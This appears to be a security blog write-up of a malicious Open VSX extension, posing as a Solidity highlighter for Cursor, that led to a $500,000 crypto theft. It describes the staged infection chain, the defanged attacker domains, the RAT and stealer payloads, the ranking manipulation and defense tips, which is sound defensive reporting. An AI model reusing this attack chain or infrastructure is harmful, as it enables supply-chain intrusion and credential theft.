Malicious Open VSX Extension Used in $500K Crypto Heist

A deep dive into one of 2025’s most sophisticated open-source supply chain attacks

A malicious extension hosted on the Open VSX marketplace was used to steal $500,000 in cryptocurrency from a security-conscious developer. Disguised as a harmless Solidity syntax highlighter, the extension was quietly downloaded, activated, and used to gain remote access, steal credentials, and drain wallets.

Although the plugin has since been removed, the attackers have already begun uploading new variants—a troubling sign for the open-source ecosystem.

How the Scam Worked

The attackers deployed multiple strategies to make the extension appear legitimate:

• Fake Popularity: Inflated download numbers to boost credibility

• Search Manipulation: Used Open VSX’s ranking algorithm to appear above genuine tools

• Rapid Re-Uploads: As soon as one plugin was taken down, clones were reuploaded under new names

Key Takeaway: Even in trusted developer ecosystems, malware can hide in plain sight. Verifying every extension before installation is no longer optional—it's essential.

The $500K Scam Hidden in a Code Highlighter

Malicious Open-Source Packages: A Growing Threat

Attacks leveraging public package repositories like npm, PyPI, and now Open VSX are on the rise. Despite heightened awareness and researcher vigilance, attackers continue to profit by exploiting open-source trust models.

Timeline of the Attack

June 2025

A Russian blockchain developer reached out to investigators after losing half a million dollars in cryptocurrency. The case was unusual:

• The operating system had been freshly installed

• Only trusted, widely used software had been downloaded

• The developer was highly cautious with transactions

• A full disk image was captured for forensic review

---

Discovery: Malware Masquerading as a Solidity Extension

The forensic analysis revealed a malicious file:

%userprofile%\.cursor\extensions\solidityai.solidity-1.0.9-universal\src\extension.js

This script fetched and executed a PowerShell payload from angelic[.]su—clear evidence of malware.

---

The Fake Plugin in Cursor AI

The infected extension was a fake Solidity language support plugin on Open VSX, posing as a legitimate tool for Cursor AI (an AI-enhanced IDE built on VS Code).

What it claimed:

• Syntax highlighting for Solidity smart contracts

• Code optimization features

What it actually did:

• Contained zero functional code

• Copied its description from a legitimate plugin

• Served only one purpose: download and execute malware

How the Victim Got Tricked

The developer searched for "solidity" in Cursor AI’s marketplace. The results:

• Malicious extension: Ranked 4th, with 54K downloads

• Legitimate extension: Ranked 8th, with 61K downloads

Why?

Open VSX ranks extensions by “relevance,” factoring in:

• Download count

• Recent updates

• Ratings

• Verification status

The attackers gamed the system:

• Faked a recent update (June 15 vs. May 30)

• Likely used bots to inflate downloads

Assuming the non-working extension was buggy, the victim left it installed—while malware ran silently in the background.

Infection Chain: From PowerShell to Full Takeover

Stage 1

The plugin downloaded 1.txt (PowerShell) from angelic[.]su.

Stage 2

If ScreenConnect wasn’t present, it downloaded 2.txt, which:

• Installed ScreenConnect from lmfao[.]su

• Connected to a C2 server: relay.lmfao[.]su

Credential Theft & RAT Deployment

Next, the attackers executed three obfuscated VBS scripts:

• a.vbs, b.vbs, m.vbs

• Fetched more PowerShell payloads from paste.ee

• Downloaded hidden malware via archive[.]org image loaders

Payloads Deployed:

• Quasar RAT: Remote access tool via a.vbs and b.vbs

• Credential Stealer: Targeted crypto wallets, browsers, and email clients via m.vbs

The stolen credentials led to the theft of $500,000 in digital assets.

The Attackers Rebrand and Relaunch

After the malicious plugin was removed on July 2, 2025, the attackers immediately:

• Reuploaded a new extension named “solidity”—matching the legitimate name

• Faked 2 million downloads to leapfrog legitimate results

• Spoofed the developer name:

LegitFakejuanblancojuanbIanco (with capital "i" instead of "l")

Now, the Cursor AI extension marketplace showed two nearly identical entries—one safe, one malicious.

Broader Campaign Discovered

Further investigation uncovered a wider campaign:

• npm package solsafe: Dropped ScreenConnect via staketree[.]net/1.txt

• Other VS Code-style extensions:

  • solaibot, among-eth, blankebesxstnion

  • All used the same infection and obfuscation techniques

Common Attack Patterns

• PowerShell scripts named 1.txt, 2.txt

• Obfuscated VBS scripts calling paste.ee

• Payloads hidden in image files hosted on archive[.]org

---

Key Takeaways & Defense Tips

1. Verify Before You Trust

• Check developer names closely

• Review update dates and download spikes

• If a plugin doesn’t work—inspect its code

2. Use Real Security Tools

• Even basic antivirus could have blocked Quasar RAT and the stealer

3. Watch for Suspicious Activity

• Monitor for unexpected PowerShell or ScreenConnect activity

4. Assume Repositories Can Be Dangerous

• Open VSX, npm, PyPI, and others are frequent targets

• Don't assume trust just because it’s open source

---

Final Thoughts

This incident proves what security professionals have warned for years: Open-source software can be weaponized, even in tools trusted by developers and engineers.

A single fake syntax highlighter cost one developer $500,000. The next victim could be a dev team, an exchange, or a DAO.

Trust nothing. Verify everything.

(Note: Malicious domains like angelic[.]su, lmfao[.]su, and others are redacted for safety.)